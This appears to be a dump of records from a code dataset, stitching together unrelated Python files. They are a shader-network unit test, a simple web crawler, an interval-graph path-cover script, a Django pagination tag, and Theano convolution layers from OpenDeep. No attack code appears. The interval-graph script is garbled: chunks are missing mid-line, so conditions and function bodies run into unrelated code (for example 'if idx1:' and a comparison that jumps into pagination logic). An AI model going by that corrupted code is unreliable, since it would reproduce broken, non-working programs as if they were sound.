\"\" ),\n\t\t)\n\n\t\tIECoreScene.ShaderNetworkAlgo.removeUnusedShaders( n )\n\t\tself.assertEqual( set( n.shaders().keys() ), { \"used1\", \"used2\", \"used3\" } )\n\n\tdef testConvertColorComponentOutputConnection( self ) :\n\n\t\t# OSL < 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"noise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader( \"plastic\", \"osl:surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture\", \"out.r\" ), ( \"surface\", \"Kd\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Ks\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Kt\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 2 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n )\n\t\tself.assertEqual( len( n ), 4 )\n\n\t\tself.assertEqual( len( 
n.inputConnections( \"surface\" ) ), 3 )\n\t\tself.assertEqual( len( n.inputConnections( \"texture\" ) ), 0 )\n\n\t\tkdInput = n.input( ( \"surface\", \"Kd\" ) )\n\t\tself.assertEqual( kdInput.name, \"out\" )\n\t\tself.assertEqual( n.getShader( kdInput.shader ).type, \"osl:shader\" )\n\t\tself.assertEqual( n.getShader( kdInput.shader ).name, \"MaterialX/mx_swizzle_color_float\" )\n\t\tself.assertEqual( n.getShader( kdInput.shader ).parameters[\"channels\"].value, \"r\" )\n\n\t\tksInput = n.input( ( \"surface\", \"Ks\" ) )\n\t\tself.assertEqual( ksInput.name, \"out\" )\n\t\tself.assertEqual( n.getShader( ksInput.shader ).type, \"osl:shader\" )\n\t\tself.assertEqual( n.getShader( ksInput.shader ).name, \"MaterialX/mx_swizzle_color_float\" )\n\t\tself.assertEqual( n.getShader( ksInput.shader ).parameters[\"channels\"].value, \"g\" )\n\n\t\tself.assertEqual( n.input( ( \"surface\", \"Kt\" ) ), ksInput )\n\n\t\t# OSL > 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"noise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader( \"plastic\", \"osl:surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture\", \"out.r\" ), ( \"surface\", \"Kd\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Ks\" ) ),\n\t\t\t\t( ( \"texture\", \"out.g\" ), ( \"surface\", \"Kt\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 2 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n, 11000 )\n\t\tself.assertEqual( len( n ), 2 )\n\n\t\tself.assertEqual( len( n.inputConnections( \"surface\" ) ), 3 )\n\t\tself.assertEqual( len( n.inputConnections( \"texture\" ) ), 0 )\n\n\t\tself.assertEqual( n.input( ( \"surface\", \"Kd\" ) ), ( \"texture\", \"out[0]\" ) )\n\t\tself.assertEqual( n.input( ( \"surface\", \"Ks\" ) ), ( \"texture\", \"out[1]\" ) )\n\t\tself.assertEqual( n.input( ( \"surface\", \"Kt\" ) ), ( \"texture\", \"out[1]\" ) )\n\n\tdef testConvertColorComponentInputConnection( self ) :\n\n\t\t# OSL < 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture1\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"texture2\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader(\n\t\t\t\t\t\"plastic\", \"osl:surface\",\n\t\t\t\t\tparameters = { \"Cs\" : imath.Color3f( 0.2, 0.3, 0.4 ) }\n\t\t\t\t)\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture1\", \"out\" ), ( \"surface\", \"Cs.r\" ) ),\n\t\t\t\t( ( \"texture2\", \"out\" ), ( \"surface\", \"Cs.b\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 3 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n )\n\t\tself.assertEqual( len( n ), 4 )\n\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.r\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.g\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.b\" ) ) )\n\n\t\tcsInput = n.input( ( \"surface\", \"Cs\" ) )\n\t\tself.assertEqual( csInput.name, \"out\" )\n\n\t\tpackShader = n.getShader( csInput.shader )\n\t\tself.assertEqual( packShader.name, \"MaterialX/mx_pack_color\" )\n\t\tself.assertEqual( packShader.type, \"osl:shader\" )\n\n\t\tself.assertEqual( packShader.parameters[\"in1\"], IECore.FloatData( 0.2 ) )\n\t\tself.assertEqual( packShader.parameters[\"in2\"], IECore.FloatData( 0.3 ) )\n\t\tself.assertEqual( packShader.parameters[\"in3\"], IECore.FloatData( 0.4 ) )\n\n\t\tself.assertEqual( n.input( ( 
csInput.shader, \"in1\" ) ), ( \"texture1\", \"out\" ) )\n\t\tself.assertEqual( n.input( ( csInput.shader, \"in2\" ) ), ( \"\", \"\" ) )\n\t\tself.assertEqual( n.input( ( csInput.shader, \"in3\" ) ), ( \"texture2\", \"out\" ) )\n\n\t\t# OSL > 1.10\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"texture1\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"texture2\" : IECoreScene.Shader( \"floatNoise\", \"osl:shader\" ),\n\t\t\t\t\"surface\" : IECoreScene.Shader(\n\t\t\t\t\t\"plastic\", \"osl:surface\",\n\t\t\t\t\tparameters = { \"Cs\" : imath.Color3f( 0.2, 0.3, 0.4 ) }\n\t\t\t\t)\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"texture1\", \"out\" ), ( \"surface\", \"Cs.r\" ) ),\n\t\t\t\t( ( \"texture2\", \"out\" ), ( \"surface\", \"Cs.b\" ) ),\n\t\t\t],\n\t\t\toutput = \"surface\"\n\t\t)\n\n\t\tself.assertEqual( len( n ), 3 )\n\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n, 11000 )\n\t\tself.assertEqual( len( n ), 3 )\n\n\t\tself.assertEqual( n.input( ( \"surface\", \"Cs[0]\" ) ), ( \"texture1\", \"out\" ) )\n\t\tself.assertEqual( n.input( ( \"surface\", \"Cs[2]\" ) ), ( \"texture2\", \"out\" ) )\n\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.r\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.g\" ) ) )\n\t\tself.assertFalse( n.input( ( \"surface\", \"Cs.b\" ) ) )\n\n\tdef testArnoldComponentConnectionsNotConverted( self ) :\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"flat1\" : IECoreScene.Shader( \"flat\", \"ai:shader\" ),\n\t\t\t\t\"flat2\" : IECoreScene.Shader( \"flat\", \"ai:surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"flat1\", \"r\" ), ( \"flat2\", \"color.g\" ) )\n\t\t\t],\n\t\t\toutput = \"flat2\"\n\t\t)\n\n\t\tn2 = n.copy()\n\t\tIECoreScene.ShaderNetworkAlgo.convertOSLComponentConnections( n2 )\n\t\tself.assertEqual( n, n2 )\n\n\tdef testConvertObjectVector( self ) :\n\n\t\tobjectVector = IECore.ObjectVector( [\n\t\t\tIECoreScene.Shader( \"noise\", parameters = { \"__handle\" : \"textureHandle\" } ),\n\t\t\tIECoreScene.Shader( \"standard_surface\", parameters = { \"base\" : \"link:textureHandle.r\", \"base_color\" : \"link:textureHandle\" } ),\n\t\t] )\n\n\t\tshaderNetwork = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"textureHandle\" : IECoreScene.Shader( \"noise\" ),\n\t\t\t\t\"shader\" : IECoreScene.Shader( \"standard_surface\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"textureHandle\", \"r\" ), ( \"shader\", \"base\" ) ),\n\t\t\t\t( ( \"textureHandle\" ), ( \"shader\", \"base_color\" ) ),\n\t\t\t],\n\t\t\toutput = \"shader\",\n\t\t)\n\n\t\tself.assertEqual( IECoreScene.ShaderNetworkAlgo.convertObjectVector( objectVector ), shaderNetwork )\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"test/IECoreScene/ShaderNetworkAlgoTest.py","file_name":"ShaderNetworkAlgoTest.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"619488431","text":"\n\"\"\"\n A Web crawler is an Internet bot which helps in Web indexing. They crawl one page at a time through a website until\n all pages have been indexed. 
Web crawlers help in collecting information about a website and the links related to\n them, and also help in validating the HTML code and hyperlinks.\n\n Just a def from Internet (First one I Found).\n\n Uses BeautifulSoup as core and request for communication.\n Also, Some Regular Expressions are involved.\n\n Way Forward,\n Using user inputs to make crawling more efficient (Thinking of a base json structure).\n\n\"\"\"\n\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\n\nclass Spidy:\n\n def __init__(self, starting_url, depth, file_name):\n \"\"\"\n :param starting_url: Base URL to crawl\n :param depth: How much it should jump from one url to another\n :param file_name: path of the output file\n \"\"\"\n self.starting_url = starting_url\n self.depth = depth\n self.file_name = file_name\n self.name = \"\"\n\n def crawl(self):\n # getting links from the given url\n # appending links in class variable\n current_depth = 0\n depth_links = [self.get_links(self.starting_url)]\n\n while current_depth <= self.depth:\n current_links = []\n for link in depth_links[current_depth]:\n # getting new links and extending them\n current_links.extend(self.get_links(link))\n # writing into text file\n fio = open(self.file_name, \"a\")\n fio.write('Link ' + str(link) + ' Name ' + self.name + ' Depth ' + str(current_depth) + \"\\n\")\n fio.close()\n # increasing the current depth by 1\n current_depth += 1\n # appending all the current links into depth_links\n depth_links.append(current_links)\n\n def get_links(self, link):\n link_temp = []\n\n # getting the web page\n starting = requests.get(link)\n # converting it into simple html text\n starting_page = starting.text\n # creating and initializing object of the class beautifulSoup (import required)\n page = BeautifulSoup(starting_page)\n\n # getting titles of the web pages\n name_temp = page.title.string\n\n for x in page.findAll('a', attrs={'href': re.compile(\"^http://\")}):\n link_temp.append(x.get('href'))\n\n # storing in class variable\n links = link_temp\n self.name = name_temp\n # returning all the links\n return links\n","sub_path":"spidy/spidy.py","file_name":"spidy.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"147134027","text":"import re\r\nimport sys\r\nimport math\r\nimport networkx as nx\r\nfrom matplotlib import pyplot as plt\r\nfrom collections import defaultdict\r\ndef input(): return sys.stdin.readline().rstrip('\\r\\n')\r\ntake_input = lambda: list(map(int, input().split()))\r\n\r\nsys.stdin = open('input.txt', 'r') \r\nsys.stdout = open('output.txt', 'w') \r\n\r\nGraph = defaultdict(list)\r\nFinalGraph = defaultdict(list)\r\nFinalGraphNodeData = defaultdict(list)\r\nNodeIntervalG = defaultdict(list)\r\nedges = defaultdict(list)\r\nedgeinbetween = defaultdict(list)\r\nedgeIntervalG = defaultdict(list)\r\ndist=defaultdict(list)\r\nedgeDist=defaultdict(list)\r\n\r\ndef addEdge(graph,u,v):\r\n graph[u].append(v)\r\n graph[v].append(u)\r\n\r\nn,m = take_input()\r\n\r\nfor j in range (1,m+1):\r\n u,v = take_input()\r\n su = \"v\"+str(u);\r\n sv = \"v\"+str(v);\r\n addEdge(Graph,su,sv)\r\n edges[j]=(su,sv)\r\n edgeinbetween[(su,sv)] = j\r\n edgeinbetween[(sv,su)] = j\r\n\r\nfor j in range (1,n+1):\r\n vj = \"v\"+str(j);\r\n l,r = take_input()\r\n NodeIntervalG[vj] = (l,r)\r\n\r\nfor j in range (1,m+1):\r\n u,v = edges[j]\r\n l = max(NodeIntervalG[u][0],NodeIntervalG[v][0])\r\n r = 
min(NodeIntervalG[u][1],NodeIntervalG[v][1])\r\n    edgeIntervalG[j] = (l,r)\r\nG=nx.Graph()\r\nfor k,v in Graph.items():\r\n    G.add_node(k)\r\n    for i in v:\r\n        G.add_edge(k,i)\r\nnx.draw(G,with_labels=1)\r\nplt.title('Given arbitrary Interval graph')\r\nplt.show()  \r\nrandom_pos = nx.random_layout(G, seed=42)\r\nnode_positions = nx.spring_layout(G, pos=random_pos)  \r\npos=node_positions\r\nfor j in range(1,m+1):\r\n    u,v=edges[j]\r\n    dist_node=math.sqrt((pos[u][0] - pos[v][0])**2 + (pos[u][1] - pos[v][1])**2)\r\n    edgeDist[j]=dist_node\r\nprint('edgeDist' , edgeDist)   \r\nkey=node_positions.keys()\r\nkeylist=list(key)\r\nvalue=node_positions.values()\r\nvaluel=list(value)    \r\nv=edgeDist.values()\r\nvlist=list(v)\r\nk=edgeDist.keys()\r\nklist=list(k)\r\nke=edgeinbetween.keys()\r\nkelist=list(ke)\r\nve=edgeinbetween.values()\r\nvelist=list(ve)\r\nDEedge=[]\r\ncount=0\r\nfor j in range(len(klist)):\r\n    edgejdist=vlist[j]\r\n    #print(edgejdist)\r\n    index=velist.index(klist[j])\r\n    u=kelist[index]\r\n    #print(u)\r\n    u0=u[0]\r\n    u1=u[1]\r\n    in1=keylist.index(u0)\r\n    in2=keylist.index(u1)\r\n    v1=valuel[in1]\r\n    v2=valuel[in2]\r\n    for i in range(len(valuel)):\r\n        t=valuel[i]\r\n        ds1=math.sqrt((v1[0]-t[0])*(v1[0]-t[0])+((v1[1]-t[1])*(v1[1]-t[1])))\r\n        if ds1<=edgejdist:\r\n            count=count+1    \r\n        ds2=math.sqrt((v2[0]-t[0])*(v2[0]-t[0])+((v2[1]-t[1])*(v2[1]-t[1])))\r\n        if ds2<=edgejdist:\r\n            count=count+1\r\n    dist[j+1]=count    \r\n    count=0    \r\n#print(dist)\r\nvl=dist.values()\r\nvll=list(vl)\r\nde=defaultdict(list)\r\nfor i in range(len(vll)):\r\n    de[i+1]=vll[i]+vlist[i]\r\n    DEedge.append(vll[i]+vlist[i])\r\nprint('DE weight ', de)   \r\n#print('DEedge ',DEedge)   \r\nmaxde=13.338085831290979\r\ndef optimalpathcover(n,Graph):\r\n    opc=[]    #set of distinct path components covering all vertices of graph.\r\n    vertices=[\"v\"+str(i) for i in range(1,n+1)]    \r\n    uncoverV=[\"v\"+str(i) for i in range(1,n+1)]    #list of unvisited vertices    \r\n    vi=uncoverV[0]\r\n    num=1    #num is the number of disjoint path components    \r\n    pnum=vi    #first path is started with the rightmost vertex of an interval graph\r\n    uncoverV.remove(uncoverV[0])\r\n    def s(vi):\r\n        index=vertices.index(vi)\r\n        s=[]\r\n        for j in range(0,len(Graph[vi])):    \r\n            if Graph[vi][j] in uncoverV:\r\n                idx=vertices.index(Graph[vi][j])\r\n                t=Graph[vi][j]\r\n                e=edgeinbetween[(vi,t)]\r\n                if idx>index and de[e]<=maxde:\r\n                    s.append(Graph[vi][j])\r\n        #print(s)    \r\n        return s\r\n    \r\n    def t(vi):\r\n        index=vertices.index(vi)\r\n        t=[]\r\n        for j in range(len(Graph[vi])):\r\n            if(Graph[vi][j] in uncoverV):\r\n                idx=vertices.index(Graph[vi][j])\r\n                t1=Graph[vi][j]\r\n                e=edgeinbetween[(vi,t1)]\r\n                if idx1:\r\n        T=opc[0]\r\n        opc.remove(T)\r\n        Tlist=get_List(T)\r\n        T_lmv=Tlist[0]\r\n        tdict=get_Dict(T)\r\n        T=nx.path_graph(len(Tlist))\r\n        T.add_nodes_from(tdict)\r\n        T=nx.relabel_nodes(T,tdict)\r\n        \r\n        def minimumrightend(nghT):\r\n            ngh=''.join(nghT)\r\n            number=[int(i) for i in re.findall(r'\\d+', ngh)]\r\n            numlist=sorted(number)\r\n            nghList=[\"v\"+str(numlist[i]) for i in range(len(number))]    \r\n            minvalue=nghList[0]\r\n            return minvalue\r\n\r\n        def to_int(a):\r\n            a=a[1:]\r\n            return int(a);\r\n        \r\n        while opc!=[]:\r\n            q=opc[0]\r\n            nghq=[]\r\n            nghT=[]\r\n            qlist=get_List(q)\r\n            qdict=get_Dict(q)\r\n            q=nx.path_graph(len(qlist))\r\n            q.add_nodes_from(qdict)\r\n            q=nx.relabel_nodes(q,qdict)\r\n            q_lmv=qlist[0]\r\n            if to_int(q_lmv)power[1] or (mx==power[1] and mn= count:\n        endPage = count+1\n        startPage = endPage-TOTAL_PAGES+1\n        if startPage < 1:\n            startPage = 1\n    \n    \n    page_numbers = [n for n in 
range(startPage, endPage)]\n \n get_dict = context['request'].GET.copy()\n if get_dict.get('page'):\n del get_dict['page']\n \n get = '?'+''.join([ key+'='+value+'&' for key, value in get_dict.items()])\n if len(get) == 1:\n get = get.rstrip('&')\n \n return render_to_string('pagination.html',\n {'page_obj':context['page_obj'],\n 'page_range':page_numbers,\n 'show_first': 1 not in page_numbers,\n 'show_last': count not in page_numbers,\n 'num_pages':count,\n 'get':get})\n\n\n\n\n","sub_path":"pagination/templatetags/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"23544034","text":"\"\"\"\n.. module:: convolutional\n\nThis module provides the layers necessary for convolutional nets.\n\nTO USE CUDNN WRAPPING, YOU MUST INSTALL THE APPROPRIATE .h and .so FILES FOR THEANO LIKE SO:\nhttp://deeplearning.net/software/theano/library/sandbox/cuda/dnn.html\n\"\"\"\n\n__authors__ = \"Markus Beissinger\"\n__copyright__ = \"Copyright 2015, Vitruvian Science\"\n__credits__ = [\"Lasagne\", \"Weiguang Ding\", \"Ruoyan Wang\", \"Fei Mao\", \"Graham Taylor\", \"Markus Beissinger\"]\n__license__ = \"Apache\"\n__maintainer__ = \"OpenDeep\"\n__email__ = \"opendeep-dev@googlegroups.com\"\n\n# standard libraries\nimport logging\n# third party libraries\nimport numpy\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import downsample\nimport theano.compat.six as six\n# internal references\nfrom opendeep.models.model import Model\nfrom opendeep.utils.activation import get_activation_function\nfrom opendeep.utils.nnet import get_weights_gaussian, get_weights_uniform, get_bias, cross_channel_normalization_bc01\nfrom opendeep.utils.conv1d_implementations import conv1d_mc0\n\n\nlog = logging.getLogger(__name__)\n\n# flag for having NVIDIA's CuDNN library.\nhas_cudnn = True\ntry:\n from theano.sandbox.cuda import dnn\nexcept ImportError as e:\n has_cudnn = False\n log.warning(\"Could not import CuDNN from theano. For fast convolutions, \"\n \"please install it like so: http://deeplearning.net/software/theano/library/sandbox/cuda/dnn.html\")\n\n# Some convolution operations only work on the GPU, so do a check here:\nif not theano.config.device.startswith('gpu'):\n log.warning(\"You should reeeeeaaaally consider using a GPU, unless this is a small toy algorithm for fun. \"\n \"Please enable the GPU in Theano via these instructions: \"\n \"http://deeplearning.net/software/theano/tutorial/using_gpu.html\")\n\n# To use the fastest convolutions possible, need to set the Theano flag as described here:\n# http://benanne.github.io/2014/12/09/theano-metaopt.html\n# make it THEANO_FLAGS=optimizer_including=conv_meta\n# OR you could set the .theanorc file with [global]optimizer_including=conv_meta\nif theano.config.optimizer_including != \"conv_meta\":\n log.warning(\"Theano flag optimizer_including is not conv_meta (found %s)! 
\"\n                \"To have Theano cherry-pick the best convolution implementation, please set \"\n                \"optimizer_including=conv_meta either in THEANO_FLAGS or in the .theanorc file!\"\n                % str(theano.config.optimizer_including))\n\n\nclass Conv1D(Model):\n    \"\"\"\n    A 1-dimensional convolution (taken from Sander Dieleman's Lasagne framework)\n    (https://github.com/benanne/Lasagne/blob/master/lasagne/theano_extensions/conv.py)\n    \"\"\"\n    defaults = {\n        \"border_mode\": \"valid\",\n        \"weights_init\": \"uniform\",\n        'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n        'weights_mean': 0, # mean for gaussian weights init\n        'weights_std': 0.005, # standard deviation for gaussian weights init\n        'bias_init': 0.0, # how to initialize the bias parameter\n        \"activation\": 'rectifier',\n        \"convolution\": conv1d_mc0\n    }\n    def __init__(self, inputs_hook, params_hook=None, input_shape=None, filter_shape=None, stride=None,\n                 weights_init=None, weights_interval=None, weights_mean=None, weights_std=None, bias_init=None,\n                 border_mode=None, activation=None, convolution=None, config=None, defaults=defaults):\n        # combine everything by passing to Model's init\n        super(Conv1D, self).__init__(**{arg: val for (arg, val) in locals().iteritems() if arg != 'self'})\n        # configs can now be accessed through self dictionary\n\n        ##################\n        # specifications #\n        ##################\n        # grab info from the inputs_hook, or from parameters\n        # expect input to be in the form (B, C, I) (batch, channel, input data)\n        # inputs_hook is a tuple of (Shape, Input)\n        if self.inputs_hook is not None:\n            # make sure inputs_hook is a tuple\n            assert len(self.inputs_hook) == 2, \"expecting inputs_hook to be tuple of (shape, input)\"\n            self.input_shape = inputs_hook[0] or self.input_shape\n            self.input = inputs_hook[1]\n        else:\n            # make the input a symbolic matrix\n            self.input = T.ftensor3('X')\n\n        # activation function!\n        # if a string name was given, look up the correct function from our utils.\n        if isinstance(self.activation, six.string_types):\n            activation_func = get_activation_function(self.activation)\n        # otherwise, if a 'callable' was passed (i.e. custom function), use that directly.\n        else:\n            assert callable(self.activation), \"Activation function either needs to be a string name or callable!\"\n            activation_func = self.activation\n\n        # filter shape should be in the form (num_filters, num_channels, filter_length)\n        num_filters = self.filter_shape[0]\n        filter_length = self.filter_shape[2]\n\n        ################################################\n        # Params - make sure to deal with params_hook! #\n        ################################################\n        if self.params_hook:\n            # make sure the params_hook has W and b\n            assert len(self.params_hook) == 2, \\\n                \"Expected 2 params (W and b) for Conv1D, found {0!s}!\".format(len(self.params_hook))\n            W, b = self.params_hook\n        else:\n            # if we are initializing weights from a gaussian\n            if self.weights_init.lower() == 'gaussian':\n                W = get_weights_gaussian(\n                    shape=self.filter_shape, mean=self.weights_mean, std=self.weights_std, name=\"W\"\n                )\n            # if we are initializing weights from a uniform distribution\n            elif self.weights_init.lower() == 'uniform':\n                W = get_weights_uniform(shape=self.filter_shape, interval=self.weights_interval, name=\"W\")\n            # otherwise not implemented\n            else:\n                log.error(\"Did not recognize weights_init %s! Please try gaussian or uniform\" %\n                          str(self.weights_init))\n                raise NotImplementedError(\n                    \"Did not recognize weights_init %s! 
Please try gaussian or uniform\" %\n                    str(self.weights_init))\n\n            b = get_bias(shape=(num_filters,), name=\"b\", init_values=self.bias_init)\n\n            # Finally have the two parameters!\n            self.params = [W, b]\n\n        ########################\n        # Computational Graph! #\n        ########################\n        if self.border_mode in ['valid', 'full']:\n            conved = convolution(self.input,\n                                 W,\n                                 subsample=(self.stride,),\n                                 image_shape=self.input_shape,\n                                 filter_shape=self.filter_shape,\n                                 border_mode=self.border_mode)\n        elif self.border_mode == 'same':\n            conved = convolution(self.input,\n                                 W,\n                                 subsample=(self.stride,),\n                                 image_shape=self.input_shape,\n                                 filter_shape=self.filter_shape,\n                                 border_mode='full')\n            shift = (filter_length - 1) // 2\n            conved = conved[:, :, shift:self.input_shape[2] + shift]\n\n        else:\n            log.error(\"Invalid border mode: '%s'\" % self.border_mode)\n            raise RuntimeError(\"Invalid border mode: '%s'\" % self.border_mode)\n\n        self.output = activation_func(conved + b.dimshuffle('x', 0, 'x'))\n\n    def get_inputs(self):\n        return [self.input]\n\n    def get_outputs(self):\n        return self.output\n\n    def get_params(self):\n        return self.params\n\n    def save_args(self, args_file=\"conv1d_config.pkl\"):\n        super(Conv1D, self).save_args(args_file)\n\n\nclass Conv2D(Model):\n    \"\"\"\n    A 2-dimensional convolution (taken from Sander Dieleman's Lasagne framework)\n    (https://github.com/benanne/Lasagne/blob/master/lasagne/theano_extensions/conv.py)\n    \"\"\"\n    defaults = {\n        \"border_mode\": \"valid\",\n        \"weights_init\": \"uniform\",\n        'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n        'weights_mean': 0, # mean for gaussian weights init\n        'weights_std': 0.005, # standard deviation for gaussian weights init\n        'bias_init': 0.0, # how to initialize the bias parameter\n        \"activation\": 'rectifier',\n        # using the theano flag optimizer_including=conv_meta will let this conv function optimize itself.\n        \"convolution\": T.nnet.conv2d\n    }\n    def __init__(self, inputs_hook, params_hook=None, input_shape=None, filter_shape=None, strides=None,\n                 weights_init=None, weights_interval=None, weights_mean=None, weights_std=None, bias_init=None,\n                 border_mode=None, activation=None, convolution=None, config=None, defaults=defaults):\n        # combine everything by passing to Model's init\n        super(Conv2D, self).__init__(**{arg: val for (arg, val) in locals().iteritems() if arg != 'self'})\n        # configs can now be accessed through self!\n\n        ##################\n        # specifications #\n        ##################\n        # grab info from the inputs_hook, or from parameters\n        # expect input to be in the form (B, C, 0, 1) (batch, channel, rows, cols)\n        # inputs_hook is a tuple of (Shape, Input)\n        if self.inputs_hook:\n            # make sure inputs_hook is a tuple\n            assert len(self.inputs_hook) == 2, \"expecting inputs_hook to be tuple of (shape, input)\"\n            self.input_shape = inputs_hook[0] or self.input_shape\n            self.input = inputs_hook[1]\n        else:\n            # make the input a symbolic matrix\n            self.input = T.ftensor4('X')\n\n        # activation function!\n        # if a string name was given, look up the correct function from our utils.\n        if isinstance(self.activation, six.string_types):\n            activation_func = get_activation_function(self.activation)\n        # otherwise, if a 'callable' was passed (i.e. 
custom function), use that directly.\n        else:\n            assert callable(self.activation), \"Activation function either needs to be a string name or callable!\"\n            activation_func = self.activation\n\n        # filter shape should be in the form (num_filters, num_channels, filter_size[0], filter_size[1])\n        num_filters = self.filter_shape[0]\n        filter_size = self.filter_shape[2:]  # both spatial dimensions of the filter\n\n        ################################################\n        # Params - make sure to deal with params_hook! #\n        ################################################\n        if self.params_hook:\n            # make sure the params_hook has W and b\n            assert len(self.params_hook) == 2, \\\n                \"Expected 2 params (W and b) for Conv2D, found {0!s}!\".format(len(self.params_hook))\n            W, b = self.params_hook\n        else:\n            # if we are initializing weights from a gaussian\n            if self.weights_init.lower() == 'gaussian':\n                W = get_weights_gaussian(\n                    shape=self.filter_shape, mean=self.weights_mean, std=self.weights_std, name=\"W\"\n                )\n            # if we are initializing weights from a uniform distribution\n            elif self.weights_init.lower() == 'uniform':\n                W = get_weights_uniform(shape=self.filter_shape, interval=self.weights_interval, name=\"W\")\n            # otherwise not implemented\n            else:\n                log.error(\"Did not recognize weights_init %s! Please try gaussian or uniform\" %\n                          str(self.weights_init))\n                raise NotImplementedError(\n                    \"Did not recognize weights_init %s! Please try gaussian or uniform\" %\n                    str(self.weights_init))\n\n            b = get_bias(shape=(num_filters, ), name=\"b\", init_values=self.bias_init)\n\n            # Finally have the two parameters!\n            self.params = [W, b]\n\n        ########################\n        # Computational Graph! #\n        ########################\n        if self.border_mode in ['valid', 'full']:\n            conved = convolution(self.input,\n                                 W,\n                                 subsample=self.strides,\n                                 image_shape=self.input_shape,\n                                 filter_shape=self.filter_shape,\n                                 border_mode=self.border_mode)\n        elif self.border_mode == 'same':\n            conved = convolution(self.input,\n                                 W,\n                                 subsample=self.strides,\n                                 image_shape=self.input_shape,\n                                 filter_shape=self.filter_shape,\n                                 border_mode='full')\n            shift_x = (filter_size[0] - 1) // 2\n            shift_y = (filter_size[1] - 1) // 2\n            conved = conved[:, :, shift_x:self.input_shape[2] + shift_x,\n                            shift_y:self.input_shape[3] + shift_y]\n        else:\n            raise RuntimeError(\"Invalid border mode: '%s'\" % self.border_mode)\n\n        self.output = activation_func(conved + b.dimshuffle('x', 0, 'x', 'x'))\n\n    def get_inputs(self):\n        return [self.input]\n\n    def get_outputs(self):\n        return self.output\n\n    def get_params(self):\n        return self.params\n\n    def save_args(self, args_file=\"conv2d_config.pkl\"):\n        super(Conv2D, self).save_args(args_file)\n\n\nclass Conv3D(Model):\n    \"\"\"\n    A 3-dimensional convolution layer\n    \"\"\"\n    defaults = {\n        \"border_mode\": \"valid\",\n        \"weights_init\": \"uniform\",\n        'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n        'weights_mean': 0, # mean for gaussian weights init\n        'weights_std': 0.005, # standard deviation for gaussian weights init\n        'bias_init': 0.0, # how to initialize the bias parameter\n        \"activation\": 'rectifier',\n        # using the theano flag optimizer_including=conv_meta will let this conv function optimize itself.\n        \"convolution\": T.nnet.conv3D\n    }\n\n    def __init__(self):\n        log.error(\"Conv3D not implemented yet.\")\n        super(Conv3D, self).__init__()\n        raise NotImplementedError(\"Conv3D not implemented yet.\")\n\n\nclass ConvPoolLayer(Model):\n    \"\"\"\n    This is the ConvPoolLayer used for an AlexNet implementation.\n\n    Copyright (c) 2014, Weiguang 
